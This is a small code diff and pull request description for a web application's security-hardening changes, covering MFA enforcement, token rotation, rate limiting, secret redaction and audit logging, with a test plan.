-  const token = await getToken({ req, secret: process.env.NEXTAUTH_SECRET, cookieName: SESSION_COOKIE_NAME })
+  // sessionToken was already decoded above (before rate limit check) — reuse it.
+  const token = sessionToken
   if (!token || !token.sub) {
     const loginUrl = new URL('/login', req.url)
     loginUrl.searchParams.set('callbackUrl', pathname)


### PR DESCRIPTION
## Summary

Consolidates fixes for three audit categories: auth/session (CRITICAL), rate limiting (HIGH), and secrets/info-disclosure (HIGH/MEDIUM/LOW).

---

### Auth / Session

**CRITICAL** `auth.ts`: Throw `MFA_REQUIRED` error instead of returning truthy object when TOTP is enabled but no code provided — NextAuth no longer mints a valid session without MFA verification

**CRITICAL** `auth.ts`: Propagate `totpEnabled` and `mfaVerified` into JWT and session so the enforcement gate `if (totpEnabled && !mfaVerified)` is no longer dead code

**CRITICAL** New `environments/[id]/rotate-token/route.ts`: `POST` endpoint to revoke and rotate `mcga_*` gateway tokens (admin-gated, audit-logged, returns new token once)

**HIGH** `middleware.ts`: Block gateway token from ALL methods on `/api/admin/*` (was only blocking mutations) — leaked `ORION_GATEWAY_TOKEN` can no longer read user lists, system config etc.

---

### Rate Limiting

**HIGH** `middleware.ts` + `webhooks/[triggerId]/route.ts`: Apply rate limit to webhook endpoints before `PUBLIC_PATHS` early-return; add per-trigger limit (60 req/15 min) inside the handler

**HIGH** `rate-limit-redis.ts` + `middleware.ts`: Add `TRUSTED_PROXY_COUNT` (default 1) to prevent IP spoofing via leftmost `X-Forwarded-For`; add secondary per-user rate limit key for authenticated routes

**MEDIUM** `middleware.ts`: Add explicit `RATE_LIMITS` entries — `/api/tasks` (20/min), `/api/notes` (30/min), `/api/notes/search` (60/min)

**LOW** `webhooks/[triggerId]/route.ts` + `chat/.../stream/route.ts`: Return 413 if `Content-Length` exceeds 1 MB

---

### Secrets / Info-disclosure

**HIGH** `setup-token.ts`: Log only first 8 chars of `SETUP_TOKEN` — full token was bypassing the redaction wrapper

**HIGH** `vault/unseal-keys/route.ts`: Add `logAudit` on GET (`vault_unseal`) and POST (`vault_reseal`) — crown-jewel secret access was unaudited

**MEDIUM** `health/route.ts`: Strip k8s topology, model names, worker queue depths from unauthenticated response

**MEDIUM** `approve/route.ts` + `reject/route.ts`: Emit `tool_approve` / `tool_revoke` audit events

**MEDIUM** `next.config.mjs`: `poweredByHeader: false`

**LOW** `auth.ts`: `events.signOut` callback to emit `user_logout` audit entry

**LOW** `environments/route.ts`: Mask `federationToken` in POST 201 response

**LOW** `ingress/domains/route.ts`: Move domain seeding out of GET into POST — keep GET strictly read-only

## Test plan
- [ ] Login with MFA-enabled account and no TOTP code → rejected (no session minted)
- [ ] `POST /api/environments/:id/rotate-token` returns new token; old token rejected
- [ ] `GET /api/admin/users` with `ORION_GATEWAY_TOKEN` returns 403
- [ ] Rapid POSTs to `/api/webhooks/:id` hit 429 after 60 requests/15 min
- [ ] Spoofed `X-Forwarded-For` header does not bypass rate limit
- [ ] `Content-Length > 1MB` webhook POST returns 413
- [ ] `SETUP_TOKEN` log shows `abcd1234...[redacted]`
- [ ] Vault unseal-key GET creates audit log entry
- [ ] `GET /api/health` unauthenticated returns only `{ status }`
- [ ] Tool approve/reject creates audit entries
- [ ] Response headers: no `X-Powered-By`